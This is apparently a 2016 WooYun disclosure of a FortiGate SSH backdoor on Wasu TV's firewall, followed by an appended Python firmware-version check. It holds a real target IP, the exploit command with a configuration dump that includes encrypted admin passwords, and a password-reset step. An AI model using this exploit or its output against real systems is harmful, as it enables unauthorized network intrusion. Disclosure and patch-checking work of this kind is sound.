Vulnerability Summary
Defect ID: wooyun-2016-0171208
Title: A FortiGate firewall at Wasu TV has an SSH backdoor that allows VPN access into the internal network
Affected vendor: 华数数字电视传媒集团有限公司 (Wasu Digital TV Media Group Co., Ltd.)
Author: bitcoin
Submitted: 2016-01-20 11:00
Fixed: 2016-03-05 09:52
Published: 2016-03-05 09:52
Vulnerability type: unauthorized network access
Severity: High
Self-assessed rank: 20
Status: confirmed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2016-01-20: Details sent to the vendor; awaiting vendor response
2016-01-20: Vendor confirmed; details disclosed to the vendor only
2016-01-30: Details disclosed to core white hats and domain experts
2016-02-09: Details disclosed to regular white hats
2016-02-19: Details disclosed to intern white hats
2016-03-05: Details disclosed to the public
Brief description:
VPN access into the internal network
Detailed description:
IP: 218.108.5.6
This FortiGate firewall has an SSH backdoor.
I looked up the whois record
and confirmed the address belongs to your company.
WHOIS Results for:218.108.5.6
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '218.108.0.0 - 218.109.255.255'
inetnum: 218.108.0.0 - 218.109.255.255
netname: WASU
descr: WASU TV & Communication Holding Co.,Ltd.
descr: 6/F, Jian Gong Building, NO.20 Wen San Road, Hangzhou,
descr: Zhejiang province, P.R.China 310012
country: CN
admin-c: XZ1291-AP
tech-c: TF142-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
changed: hm-changed@apnic.net 20080123
changed: hm-changed@apnic.net 20151202
source: APNIC
root@bt:/var/www# python forti.py 218.108.5.6
BC_HZ_60C # show user group
config user group
edit "FSSO_Guest_Users"
set group-type fsso-service
next
edit "Guest-group"
set member "guest"
next
edit "admi_opt_G"
set member "admin_branch"
next
end
BC_HZ_60C # show system global
config system global
set admin-sport 8443
set fgd-alert-subscription advisory latest-threat
set gui-explicit-proxy disable
set hostname "BC_HZ_60C"
set tcp-halfopen-timer 120
set timezone 04
set two-factor-ftm-expiry 60
end
BC_HZ_60C # get system status
Version: FortiWiFi-60C v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FWF60C3G13006149
Botnet DB: 1.00000(2012-05-28 22:51)
BIOS version: 04000031
System Part-Number: P08947-06
Log hard disk: Available
Internal Switch mode: switch
Hostname: BC_HZ_60C
Operation Mode: NAT
Current virtual domain: root
Max number of virtual domains: 10
Virtual domains status: 1 in NAT mode, 0 in TP mode
Virtual domain configuration: disable
FIPS-CC mode: disable
Current HA mode: standalone
Branch point: 271
Release Version Information: GA Patch 6
System time: Mon Jan 18 23:40:28 2016
BC_HZ_60C # show system admin
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set ssh-public-key3 "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1xGmeuxT0vnJ5Z+8dMW3j2MuJNApkqfQlX5Zxh75G4GpbJ6wDLD3X3S+G3Ue4AOSxtpgSF8T4c8yfY7j/HtxwwONrHfCNRz/ULs34f+9svHUIcPDdNYkrePmyOm3lKqFrTn1FJDbPlLTnC2oZTSuoX5KAx3/Y5UYbFvBosjUW7R7Duy618fZ15wrFoKoXM3LUUrI4ZZfjwgCzpZQgyWJJV4iLkC94AlICPrNlkQoEKPMMzJKfAVLv4buvNGDc3Cu5CUl0qQlEIfkXZByC0BlKC1EeNhR0VnXQldvYT/mo4y3qDFPVyPK9Ec+bDPXo/z4XxTD31eWWQq00VioEngzp"
config dashboard-tabs
edit 1
set name "Status"
next
edit 2
set columns 1
set name "Top Sources"
next
edit 3
set columns 1
set name "Top Destinations"
next
edit 4
set columns 1
set name "Top Applications"
next
end
config dashboard
edit 1
set tab-id 1
set column 1
next
edit 2
set widget-type licinfo
set tab-id 1
set column 1
next
edit 3
set widget-type sysres
set tab-id 1
set column 2
next
edit 42
set widget-type gui-features
set tab-id 1
set column 2
next
edit 4
set widget-type jsconsole
set tab-id 1
set column 2
next
edit 5
set widget-type alert
set tab-id 1
set column 2
set top-n 10
next
edit 21
set widget-type sessions
set tab-id 2
set column 1
set top-n 25
set sort-by msg-counts
next
edit 31
set widget-type sessions
set tab-id 3
set column 1
set top-n 25
set sort-by msg-counts
set report-by destination
next
edit 41
set widget-type sessions
set tab-id 4
set column 1
set top-n 25
set sort-by msg-counts
set report-by application
next
end
set password ENC AK1c6/7vU6fy5GXrH2O4eWJuer77FlPff9GGE8qWEXfkv4=
next
edit "admin_branch"
set accprofile "opr_admin"
set vdom "root"
config dashboard
edit 1
set widget-type gui-features
set tab-id 1
set column 2
next
end
set password ENC AK1c0b+ocn3KOdTKwaid97NzcK/1hX+4UQeED1Kgt7RjgI=
next
edit "radius"
set accprofile "super_admin"
set vdom "root"
set password ENC AK1XORarUH865C+TeuWunT/E+nseKMhhrN/M5NU/criK+w=
next
end
The administrator password can be reset at will; I won't go any further here.
See also
WooYun: superalloy (巧新科技) FortiGate firewall backdoor allows VPN login
Stopping here.
config system admin
edit admin
set password ****
end
Exploit script:
http://seclists.org/fulldisclosure/2016/Jan/26
Proof of vulnerability: the `get system status` output already shown in the detailed description above.
Fix recommendation:
Upgrade the firewall
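As an added defender-side example (not part of the original report or of any Fortinet tooling): a small check that parses the `Version:` line of the `get system status` output quoted in the report and flags whether the firmware sits below the patch level at which the hard-coded SSH account was removed. The baseline map (4.3.17 and 5.0.8, from Fortinet's January 2016 statement) is an assumption to verify against the vendor advisory, and the status text is a constructed sample in the report's format.

```python
import re

# Constructed sample in the exact format of the report's `get system status` output.
STATUS_SAMPLE = """\
Version: FortiWiFi-60C v5.0,build0271,140124 (GA Patch 6)
Serial-Number: FWF60C3G13006149
Hostname: BC_HZ_60C
Operation Mode: NAT
"""

# Assumed baseline (verify against the vendor advisory): first patch level in each
# affected FortiOS branch that no longer ships the hard-coded SSH account, per
# Fortinet's January 2016 statement (4.3.17 and 5.0.8).
MIN_FIXED_PATCH = {"4.3": 17, "5.0": 8}

VERSION_RE = re.compile(
    r"^Version:\s*(?P<model>\S+)\s+v(?P<branch>\d+\.\d+),build(?P<build>\d+),"
    r"(?P<date>\d{6})\s*\(GA Patch (?P<patch>\d+)\)",
    re.MULTILINE,
)


def parse_status(text):
    """Pull model, branch, build, build date, patch level and hostname out of
    a `get system status` dump. Raises ValueError if no Version line is found."""
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError("no recognisable 'Version:' line")
    info = {k: m.group(k) for k in ("model", "branch", "date")}
    info["build"] = int(m.group("build"))
    info["patch"] = int(m.group("patch"))
    host = re.search(r"^Hostname:\s*(\S+)", text, re.MULTILINE)
    info["hostname"] = host.group(1) if host else None
    return info


def assess(info, baseline=MIN_FIXED_PATCH):
    """'affected' if the branch is listed and the patch level is below the fix,
    'patched' if at or above it, 'unknown' for branches not in the baseline
    (those need a manual check rather than a silent pass)."""
    fixed = baseline.get(info["branch"])
    if fixed is None:
        return "unknown"
    return "affected" if info["patch"] < fixed else "patched"


if __name__ == "__main__":
    device = parse_status(STATUS_SAMPLE)
    print(device["hostname"], device["model"], device["branch"],
          "patch", device["patch"], "->", assess(device))
```

Run it over the `get system status` output of each device in an inventory to get a quick list of units still carrying the old code, then confirm each one against the advisory before scheduling the upgrade.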
Copyright notice: when reposting, please credit bitcoin@乌云 (WooYun).
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability rank: 10
Confirmed: 2016-01-20 14:41
Vendor reply:
Confirmed, being handled.
Latest status:
None yet